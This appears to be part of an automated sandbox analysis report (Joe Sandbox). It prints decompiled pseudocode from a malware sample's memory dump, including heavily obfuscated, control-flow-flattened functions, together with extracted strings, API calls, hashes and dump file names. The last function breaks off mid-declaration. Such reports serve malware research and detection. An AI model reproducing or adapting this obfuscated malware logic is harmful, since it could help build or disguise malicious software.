			E007A9714(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t251;
				intOrPtr _t252;
				intOrPtr _t253;
				void* _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				void* _t292;
				void* _t293;
				signed int* _t296;
				signed int* _t297;

				_t296 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xc5b764;
				_v8 = 0xb6da07;
				_v100 = 0x6b81aa;
				_v100 = _v100 ^ 0x5133456b;
				_t8 =  &_v100; // 0x5133456b
				_v100 =  *_t8 * 0x6e;
				_t292 = __edx;
				_v100 = _v100 << 0xa;
				_v100 = _v100 ^ 0x922ec96f;
				_t257 = __ecx;
				_v20 = 0x2c208b;
				_t293 = 0x52ffaa2;
				_v20 = _v20 + 0xffff37e6;
				_v20 = _v20 ^ 0x00212911;
				_v60 = 0xb21c01;
				_v60 = _v60 ^ 0x31980a41;
				_v60 = _v60 + 0xffff033c;
				_v60 = _v60 ^ 0x31255444;
				_v64 = 0x612501;
				_v64 = _v64 << 2;
				_v64 = _v64 + 0xf44;
				_v64 = _v64 ^ 0x018d6347;
				_v52 = 0x111460;
				_v52 = _v52 + 0xffffc2ff;
				_v52 = _v52 | 0x8d441097;
				_v52 = _v52 ^ 0x8d5fe5cb;
				_v56 = 0xb6e38a;
				_t259 = 0x67;
				_v56 = _v56 / _t259;
				_t260 = 0x41;
				_v56 = _v56 * 0x32;
				_v56 = _v56 ^ 0x00536033;
				_v96 = 0xaa1e09;
				_v96 = _v96 / _t260;
				_t261 = 0x73;
				_v96 = _v96 * 0xd;
				_v96 = _v96 / _t261;
				_v96 = _v96 ^ 0x00047537;
				_v88 = 0xebbfc;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x3053ba58;
				_t262 = 0x7f;
				_v88 = _v88 / _t262;
				_v88 = _v88 ^ 0x006c206b;
				_v44 = 0xece271;
				_v44 = _v44 + 0xffff86ef;
				_v44 = _v44 + 0x6a70;
				_v44 = _v44 ^ 0x00eb9b45;
				_v48 = 0xd70038;
				_v48 = _v48 | 0x378b661e;
				_v48 = _v48 ^ 0xfc23f8e2;
				_v48 = _v48 ^ 0xcbf8b4c1;
				_v92 = 0x86f3ef;
				_v92 = _v92 << 0xd;
				_v92 = _v92 >> 0xd;
				_v92 = _v92 + 0x4513;
				_v92 = _v92 ^ 0x000ef1b6;
				_v80 = 0x7a204;
				_v80 = _v80 + 0xffffa60a;
				_v80 = _v80 | 0x4d150135;
				_v80 = _v80 + 0xffff9d32;
				_v80 = _v80 ^ 0x4d179d3b;
				_v40 = 0x124198;
				_v40 = _v40 ^ 0x5335feb3;
				_t263 = 0x78;
				_v40 = _v40 * 0x18;
				_v40 = _v40 ^ 0xcbb00a78;
				_v84 = 0xcaa24a;
				_v84 = _v84 * 0x42;
				_v84 = _v84 ^ 0x45be5790;
				_v84 = _v84 + 0xffff0d2f;
				_v84 = _v84 ^ 0x718e360f;
				_v24 = 0x4d7038;
				_v24 = _v24 | 0x28b75b7a;
				_v24 = _v24 ^ 0x28f4655f;
				_v28 = 0x844762;
				_v28 = _v28 ^ 0xe0e1df8a;
				_v28 = _v28 ^ 0xe064bc9e;
				_v32 = 0xfc2930;
				_v32 = _v32 / _t263;
				_v32 = _v32 ^ 0x00028374;
				_v104 = 0xce3f74;
				_v104 = _v104 + 0x3224;
				_v104 = _v104 + 0x85ca;
				_t264 = 0xe;
				_v104 = _v104 / _t264;
				_v104 = _v104 ^ 0x0007887d;
				_v68 = 0x11fdc1;
				_v68 = _v68 | 0x0fd109af;
				_t265 = 0x52;
				_v68 = _v68 / _t265;
				_v68 = _v68 ^ 0x00367c27;
				_v72 = 0xa9a7e;
				_v72 = _v72 * 0x16;
				_v72 = _v72 ^ 0xca0bce5f;
				_v72 = _v72 ^ 0xcae4b7d2;
				_v76 = 0xb2d6c0;
				_v76 = _v76 + 0xffff5dcd;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0002e66e;
				_v16 = 0x41627;
				_v16 = _v16 + 0xccf7;
				_v16 = _v16 ^ 0x00091dff;
				_v36 = 0xd94625;
				_v36 = _v36 + 0x741;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x4d68793e;
				while(1) {
					L1:
					_t251 = 0xc3f018b;
					do {
						L2:
						while(_t293 != 0x52ffaa2) {
							if(_t293 == 0x865547f) {
								_t265 = _v80;
								_t252 = E007ACDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
								_t296 =  &(_t296[2]);
								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
								__eflags = _t252;
								_t251 = 0xc3f018b;
								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t293 == 0xb133873) {
								_push(_v64);
								_t253 = E007BC3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
								_t297 =  &(_t296[4]);
								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
								__eflags = _t253;
								if(_t253 != 0) {
									E007A7B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
									_push( *((intOrPtr*)(_t292 + 0x38)));
									_push(_v92);
									_push(_v48);
									_t265 = _v88;
									E007A7C37(_v88, _v44);
									_t296 =  &(_t297[6]);
									_t293 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t293 == 0xb7a2405) {
									return E007B9E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
								}
								if(_t293 != _t251) {
									goto L13;
								} else {
									_t253 = E007A46BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E007A219A, _v72);
									_t296 =  &(_t296[0xa]);
									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
									if(_t253 == 0) {
										_t293 = 0xb7a2405;
										while(1) {
											L1:
											_t251 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t253;
						}
						_t293 = 0xb133873;
						L13:
						__eflags = _t293 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t251;
				}
			}

0x007a9714
0x007a9717
0x007a971c
0x007a9724
0x007a972c
0x007a9734
0x007a973c
0x007a9745
0x007a9749
0x007a974b
0x007a9752
0x007a975a
0x007a975c
0x007a9764
0x007a9769
0x007a9771
0x007a9779
0x007a9781
0x007a9789
0x007a9791
0x007a9799
0x007a97a1
0x007a97a6
0x007a97ae
0x007a97b6
0x007a97be
0x007a97c6
0x007a97ce
0x007a97d6
0x007a97e4
0x007a97e9
0x007a97f4
0x007a97f7
0x007a97fb
0x007a9803
0x007a9813
0x007a981c
0x007a981f
0x007a982b
0x007a982f
0x007a9837
0x007a983f
0x007a9844
0x007a9850
0x007a9853
0x007a9857
0x007a985f
0x007a9867
0x007a986f
0x007a9877
0x007a987f
0x007a9887
0x007a988f
0x007a9897
0x007a989f
0x007a98a7
0x007a98ac
0x007a98b1
0x007a98b9
0x007a98c1
0x007a98c9
0x007a98d3
0x007a98e0
0x007a98e8
0x007a98f0
0x007a98f8
0x007a9907
0x007a990a
0x007a990e
0x007a9916
0x007a9923
0x007a9927
0x007a992f
0x007a9937
0x007a993f
0x007a9947
0x007a994f
0x007a9957
0x007a995f
0x007a9967
0x007a996f
0x007a997f
0x007a9983
0x007a998b
0x007a9993
0x007a999b
0x007a99a7
0x007a99ac
0x007a99b2
0x007a99ba
0x007a99c2
0x007a99ce
0x007a99d1
0x007a99d5
0x007a99dd
0x007a99ea
0x007a99ee
0x007a99f6
0x007a99fe
0x007a9a06
0x007a9a0e
0x007a9a13
0x007a9a18
0x007a9a20
0x007a9a28
0x007a9a30
0x007a9a38
0x007a9a40
0x007a9a48
0x007a9a4d
0x007a9a55
0x007a9a55
0x007a9a55
0x007a9a5a
0x00000000
0x007a9a5a
0x007a9a6c
0x007a9b32
0x007a9b36
0x007a9b3b
0x007a9b3e
0x007a9b41
0x007a9b45
0x007a9b4a
0x00000000
0x007a9b4a
0x007a9a78
0x007a9ac5
0x007a9ad8
0x007a9add
0x007a9ae0
0x007a9ae3
0x007a9ae5
0x007a9afd
0x007a9b02
0x007a9b05
0x007a9b09
0x007a9b11
0x007a9b15
0x007a9b1a
0x007a9b1d
0x00000000
0x007a9b1d
0x007a9a7a
0x007a9a7c
0x00000000
0x007a9b7a
0x007a9a84
0x00000000
0x007a9a8a
0x007a9aae
0x007a9ab3
0x007a9ab6
0x007a9abb
0x007a9ac1
0x007a9a55
0x007a9a55
0x007a9a55
0x00000000
0x007a9a55
0x007a9a55
0x007a9abb
0x007a9a84
0x007a9b82
0x007a9b82
0x007a9b52
0x007a9b57
0x007a9b57
0x007a9b57
0x00000000
0x007a9a5a

Strings

>yhM, xrefs: 007A9A4D
8pM, xrefs: 007A993F
8, xrefs: 007A987F
$2, xrefs: 007A9993
'|6, xrefs: 007A99D5
3`S, xrefs: 007A97FB
q, xrefs: 007A985F
kE3Q, xrefs: 007A973C
pj, xrefs: 007A986F
DT%1, xrefs: 007A9791
k l, xrefs: 007A9857

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
API String ID: 0-1622084174
Opcode ID: 9bb5e0bc689813006fd30944e17d1150f514e8868fc324e9b933348cba59db65
Instruction ID: 67c1eb4f50907dfb34987fa4526e8ca86139eabad2b7527613466e1b0e597b10
Opcode Fuzzy Hash: 9bb5e0bc689813006fd30944e17d1150f514e8868fc324e9b933348cba59db65
Instruction Fuzzy Hash: 43B130B2508341EFC358CF25C58A40BFBE1BBC5758F408A1DF69A96220D3B5D959CF82

Uniqueness

Uniqueness Score: -1.00%

Function 007A64E2 Relevance: 12.9, Strings: 10, Instructions: 358
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E007A64E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				signed int _v264;
				intOrPtr _v268;
				char _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				void* _t311;
				void* _t332;
				intOrPtr _t335;
				intOrPtr _t338;
				intOrPtr _t343;
				void* _t345;
				void* _t347;
				void* _t349;
				void* _t352;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr* _t362;
				intOrPtr _t364;
				signed int _t367;
				intOrPtr _t386;
				intOrPtr _t387;
				intOrPtr _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t423;
				signed int* _t425;
				void* _t427;

				_push(_a24);
				_t423 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t311);
				_v264 = _v264 & 0x00000000;
				_t425 =  &(( &_v412)[8]);
				_v268 = 0x38f10b;
				_v376 = 0x1d6e4;
				_t364 = 0;
				_v376 = _v376 + 0x2cf5;
				_t367 = 0x349a1a2;
				_v376 = _v376 + 0xffffbc4f;
				_v376 = _v376 + 0xc828;
				_v376 = _v376 ^ 0x000c4abe;
				_v344 = 0xf0b614;
				_t415 = 0x49;
				_v344 = _v344 / _t415;
				_v344 = _v344 ^ 0x0006b22b;
				_v296 = 0xc48c2;
				_v296 = _v296 >> 0xa;
				_v296 = _v296 ^ 0x0001ad51;
				_v384 = 0x7feda9;
				_t416 = 0x39;
				_v384 = _v384 * 0x1a;
				_v384 = _v384 ^ 0x3da8c069;
				_v384 = _v384 + 0xffff691b;
				_v384 = _v384 ^ 0x315a0b75;
				_v400 = 0x77d138;
				_v400 = _v400 + 0xffff5a87;
				_v400 = _v400 << 3;
				_v400 = _v400 + 0xffff9ef2;
				_v400 = _v400 ^ 0x03bdd381;
				_v312 = 0x267902;
				_v312 = _v312 | 0xf93e454e;
				_v312 = _v312 ^ 0xf93fe769;
				_v308 = 0x6d5338;
				_v308 = _v308 ^ 0x3f4c4be5;
				_v308 = _v308 ^ 0x3f211e75;
				_v328 = 0x5e1da9;
				_v328 = _v328 / _t416;
				_v328 = _v328 ^ 0x000cc368;
				_v364 = 0xd2dbf2;
				_v364 = _v364 + 0xffffefaa;
				_v364 = _v364 + 0xd543;
				_v364 = _v364 ^ 0x00d6d9fb;
				_v304 = 0x235f1e;
				_t417 = 0x2e;
				_v304 = _v304 / _t417;
				_v304 = _v304 ^ 0x000b3ded;
				_v320 = 0xc8231f;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x8237c00a;
				_v356 = 0xee2c9b;
				_v356 = _v356 ^ 0xa0da06c4;
				_v356 = _v356 ^ 0xf246f640;
				_v356 = _v356 ^ 0x52703357;
				_v412 = 0xc100a3;
				_v412 = _v412 ^ 0xb8e7c080;
				_v412 = _v412 ^ 0xb6721a67;
				_v412 = _v412 ^ 0xff44de7f;
				_v412 = _v412 ^ 0xf11e2702;
				_v396 = 0xa6af25;
				_v396 = _v396 << 0x10;
				_v396 = _v396 >> 7;
				_v396 = _v396 + 0xffff7054;
				_v396 = _v396 ^ 0x015ec427;
				_v404 = 0x1f48c8;
				_t418 = 0x2d;
				_v404 = _v404 / _t418;
				_v404 = _v404 << 0xb;
				_v404 = _v404 | 0x7455ca98;
				_v404 = _v404 ^ 0x75da0b0a;
				_v368 = 0x174318;
				_v368 = _v368 + 0x805d;
				_v368 = _v368 ^ 0x0012ca04;
				_v408 = 0x579c92;
				_t419 = 0x65;
				_v408 = _v408 * 0x61;
				_v408 = _v408 ^ 0x6a2d4e62;
				_v408 = _v408 + 0xd9d0;
				_v408 = _v408 ^ 0x4b1c9053;
				_v392 = 0x2598b2;
				_v392 = _v392 * 0xd;
				_v392 = _v392 ^ 0xb79fc0d8;
				_v392 = _v392 + 0xffff9085;
				_v392 = _v392 ^ 0xb671271d;
				_v324 = 0x8734;
				_v324 = _v324 + 0xffff82f4;
				_v324 = _v324 ^ 0x000c0e93;
				_v332 = 0x81f499;
				_v332 = _v332 ^ 0xcb023f28;
				_v332 = _v332 ^ 0xcb8aeffa;
				_v340 = 0xbb3951;
				_v340 = _v340 ^ 0x050a1ed9;
				_v340 = _v340 ^ 0x05b74055;
				_v372 = 0x5c4d3f;
				_v372 = _v372 + 0xffffba18;
				_v372 = _v372 | 0xc0b40c25;
				_v372 = _v372 >> 3;
				_v372 = _v372 ^ 0x1815f0ae;
				_v380 = 0xe44e59;
				_v380 = _v380 + 0x7d25;
				_v380 = _v380 + 0xffff00c0;
				_v380 = _v380 << 0xa;
				_v380 = _v380 ^ 0x8f30862d;
				_v360 = 0x1cbdf;
				_v360 = _v360 + 0xffff6e4b;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x0001cec6;
				_v348 = 0xf4499d;
				_v348 = _v348 + 0x832d;
				_v348 = _v348 << 2;
				_v348 = _v348 ^ 0x03dc7480;
				_v352 = 0x4c1d4a;
				_v352 = _v352 >> 0xd;
				_v352 = _v352 * 0xe;
				_v352 = _v352 ^ 0x0003e302;
				_v388 = 0x7e89b7;
				_v388 = _v388 / _t419;
				_t420 = 0x48;
				_v388 = _v388 / _t420;
				_t421 = 0x2b;
				_t414 = _v368;
				_v388 = _v388 / _t421;
				_v388 = _v388 ^ 0x000ed69e;
				_t422 = _v368;
				_v300 = 0xe9da01;
				_v300 = _v300 + 0xffffd878;
				_v300 = _v300 ^ 0x00eb5be0;
				_v336 = 0x6aaf6d;
				_v336 = _v336 * 0x22;
				_v336 = _v336 ^ 0x0e2b42a4;
				_v316 = 0x54d710;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x0000014d;
				while(1) {
					L1:
					_t332 = 0x61250f6;
					do {
						while(1) {
							L2:
							_t427 = _t367 - _t332;
							if(_t427 > 0) {
								break;
							}
							if(_t427 == 0) {
								_t352 = E007B0AE0(0x40, 1);
								_push(_v320);
								_push( &_v260);
								_push(_t352);
								_push(0xb);
								E007A80E3(_v364, _v304);
								_t425 =  &(_t425[6]);
								_t367 = 0x97954ea;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x2db8754) {
								E007B8519(_v360, _v348, _v292);
								E007B8519(_v352, _v388, _t422);
								E007B8519(_v300, _v336, _v284);
								_t367 = _t414;
								L33:
								_t332 = 0x61250f6;
								goto L34;
							}
							if(_t367 == 0x349a1a2) {
								_t422 = 0;
								E007A4B61( &_v260, 0x100, _v376, _v344);
								_v284 = _v284 & 0;
								_v280 = _v280 & 0;
								_v292 = _v292 & 0;
								_v288 = _v288 & 0;
								_t367 = 0xea9523f;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x47b49b8) {
								if(_v288 >= _v316) {
									_t359 = E007BF435( &_v292,  &_v284);
								} else {
									_t359 = E007BA666( &_v292);
								}
								_t422 = _t359;
								_t332 = 0x61250f6;
								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
								continue;
							}
							if(_t367 != 0x54d1846) {
								goto L34;
							}
							_t386 =  *0x7c3e08; // 0x0
							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
							_t413 =  *((intOrPtr*)(_t386 + 0x14));
							 *((intOrPtr*)(_t386 + 4)) = _t361;
							if(_t361 == 0) {
								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
							}
							_t362 =  *0x7c3e08; // 0x0
							if(_t413 >=  *_t362) {
								_t387 =  *0x7c3e08; // 0x0
								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
								L37:
								return _t364;
							} else {
								_t367 = 0x349a1a2;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
						}
						if(_t367 == 0x70f4b52) {
							E007B8519(_v372, _v380, _v276);
							_t367 = 0x2db8754;
							goto L33;
						}
						if(_t367 == 0x97954ea) {
							_t335 =  *0x7c3e08; // 0x0
							_t338 =  *0x7c3e08; // 0x0
							_t343 =  *0x7c3e08; // 0x0
							_t345 = E007BE395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
							_t425 =  &(_t425[0xb]);
							if(_t345 == 0) {
								_t414 = 0x54d1846;
								_t367 = 0x2db8754;
							} else {
								_t367 = 0xcdb2e90;
							}
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 == 0xcdb2e90) {
							_t347 = E007A5548(_v324, _a24, _v332, _v340,  &_v276);
							_t425 =  &(_t425[4]);
							if(_t347 == 0) {
								_t414 = 0x54d1846;
							} else {
								_t414 = 0xa80516a;
								_t364 = 1;
							}
							_t367 = 0x70f4b52;
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 != 0xea9523f) {
							goto L34;
						}
						_t349 = E007ACF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
						_t425 =  &(_t425[5]);
						if(_t349 == 0) {
							goto L37;
						}
						_t367 = 0x47b49b8;
						goto L1;
						L34:
					} while (_t367 != 0xa80516a);
					goto L37;
				}
			}

0x007a64ec
0x007a64f3
0x007a64f5
0x007a64fc
0x007a6503
0x007a650a
0x007a6511
0x007a6518
0x007a6519
0x007a651a
0x007a651f
0x007a6527
0x007a652a
0x007a6537
0x007a653f
0x007a6541
0x007a6549
0x007a654e
0x007a6556
0x007a655e
0x007a6566
0x007a6574
0x007a6579
0x007a657f
0x007a6587
0x007a6592
0x007a659a
0x007a65a5
0x007a65b2
0x007a65b5
0x007a65b9
0x007a65c1
0x007a65c9
0x007a65d1
0x007a65d9
0x007a65e1
0x007a65e6
0x007a65ee
0x007a65f6
0x007a65fe
0x007a6606
0x007a660e
0x007a6616
0x007a661e
0x007a6626
0x007a6636
0x007a663a
0x007a6642
0x007a664a
0x007a6652
0x007a665a
0x007a6662
0x007a6674
0x007a6677
0x007a667b
0x007a6683
0x007a668b
0x007a6690
0x007a6698
0x007a66a0
0x007a66a8
0x007a66b0
0x007a66b8
0x007a66c0
0x007a66c8
0x007a66d2
0x007a66da
0x007a66e2
0x007a66ea
0x007a66ef
0x007a66f4
0x007a66fc
0x007a6704
0x007a6712
0x007a6717
0x007a671d
0x007a6722
0x007a672a
0x007a6732
0x007a673a
0x007a6742
0x007a674a
0x007a6757
0x007a675a
0x007a675e
0x007a6766
0x007a676e
0x007a6776
0x007a6783
0x007a6787
0x007a678f
0x007a6797
0x007a679f
0x007a67a7
0x007a67af
0x007a67b7
0x007a67bf
0x007a67c7
0x007a67cf
0x007a67d7
0x007a67df
0x007a67e7
0x007a67ef
0x007a67f7
0x007a67ff
0x007a6804
0x007a680c
0x007a6814
0x007a681c
0x007a6824
0x007a6829
0x007a6831
0x007a6839
0x007a6841
0x007a6846
0x007a684e
0x007a6856
0x007a685e
0x007a6863
0x007a686b
0x007a6873
0x007a687d
0x007a6881
0x007a6889
0x007a6899
0x007a68a1
0x007a68a6
0x007a68b0
0x007a68b3
0x007a68b7
0x007a68bb
0x007a68c3
0x007a68c7
0x007a68d2
0x007a68dd
0x007a68e8
0x007a68f5
0x007a68f9
0x007a6901
0x007a6909
0x007a690e
0x007a6916
0x007a6916
0x007a6916
0x007a691b
0x007a691b
0x007a691b
0x007a691b
0x007a691d
0x00000000
0x00000000
0x007a6923
0x007a6a56
0x007a6a5b
0x007a6a6d
0x007a6a72
0x007a6a73
0x007a6a75
0x007a6a7a
0x007a6a7d
0x007a6916
0x007a6916
0x007a6916
0x00000000
0x007a6916
0x007a6916
0x007a692f
0x007a6a16
0x007a6a25
0x007a6a3d
0x007a6a43
0x007a6bc8
0x007a6bc8
0x00000000
0x007a6bc8
0x007a693b
0x007a69d8
0x007a69da
0x007a69df
0x007a69e6
0x007a69ed
0x007a69f4
0x007a69fd
0x007a6916
0x007a6916
0x007a6916
0x00000000
0x007a6916
0x007a6916
0x007a6947
0x007a6999
0x007a69a9
0x007a699b
0x007a699b
0x007a699b
0x007a69ae
0x007a69b7
0x007a69bc
0x00000000
0x007a69bc
0x007a694f
0x00000000
0x00000000
0x007a6955
0x007a695e
0x007a6960
0x007a6963
0x007a6966
0x007a696b
0x007a6970
0x007a6970
0x007a6973
0x007a697a
0x007a6bdb
0x007a6be1
0x007a6be8
0x007a6bf1
0x007a6980
0x007a6980
0x007a6916
0x007a6916
0x007a6916
0x00000000
0x007a6916
0x007a6916
0x007a697a
0x007a6a8d
0x007a6bbd
0x007a6bc3
0x00000000
0x007a6bc3
0x007a6a99
0x007a6b34
0x007a6b4c
0x007a6b7d
0x007a6b89
0x007a6b8e
0x007a6b93
0x007a6b9f
0x007a6ba4
0x007a6b95
0x007a6b95
0x007a6b95
0x007a6916
0x007a6916
0x007a6916
0x00000000
0x007a6916
0x007a6916
0x007a6aa5
0x007a6b0f
0x007a6b14
0x007a6b19
0x007a6b25
0x007a6b1b
0x007a6b1d
0x007a6b22
0x007a6b22
0x007a6b2a
0x007a6916
0x007a6916
0x007a6916
0x00000000
0x007a6916
0x007a6916
0x007a6aad
0x00000000
0x00000000
0x007a6ad6
0x007a6adb
0x007a6ae0
0x00000000
0x00000000
0x007a6ae6
0x00000000
0x007a6bcd
0x007a6bcd
0x00000000
0x007a6bd9

Strings

?M\, xrefs: 007A67E7
[, xrefs: 007A666D
Ty, xrefs: 007A6A7D
KL?, xrefs: 007A6616
W3pR, xrefs: 007A66B0
Ty, xrefs: 007A6A93
bN-j, xrefs: 007A675E
YN, xrefs: 007A680C
[, xrefs: 007A68DD
%}, xrefs: 007A6814

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
API String ID: 0-2895984816
Opcode ID: 99f9570105f1374f1d9233e1224e7c24317f3f2557ebfb1a3291b1605f0b2e42
Instruction ID: fbd7a5cceee8defc772ad01ee4c3b0c1f7fdf72a064fc9ce98e77bae589674a2
Opcode Fuzzy Hash: 99f9570105f1374f1d9233e1224e7c24317f3f2557ebfb1a3291b1605f0b2e42
Instruction Fuzzy Hash: B80256B1508380DFC3A4CF65C589A5BBBE1FBC5308F248A0DF69A86260C7B4D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10021854 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10021873
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

PathIsUNCA.SHLWAPI(?), ref: 100218FE
GetVolumeInformationA.KERNEL32 ref: 1002191C
CharUpperA.USER32 ref: 10021943
FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
FindClose.KERNEL32(00000000), ref: 10021960
lstrlenA.KERNEL32(?), ref: 10021975

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 3249967234-0
Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61

Uniqueness

Uniqueness Score: -1.00%

Function 007A5E60 Relevance: 11.6, Strings: 9, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007A5E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* _t339;
				intOrPtr _t372;
				void* _t374;
				intOrPtr _t381;
				intOrPtr _t382;
				void* _t384;
				intOrPtr* _t385;
				void* _t387;
				intOrPtr _t421;
				intOrPtr* _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
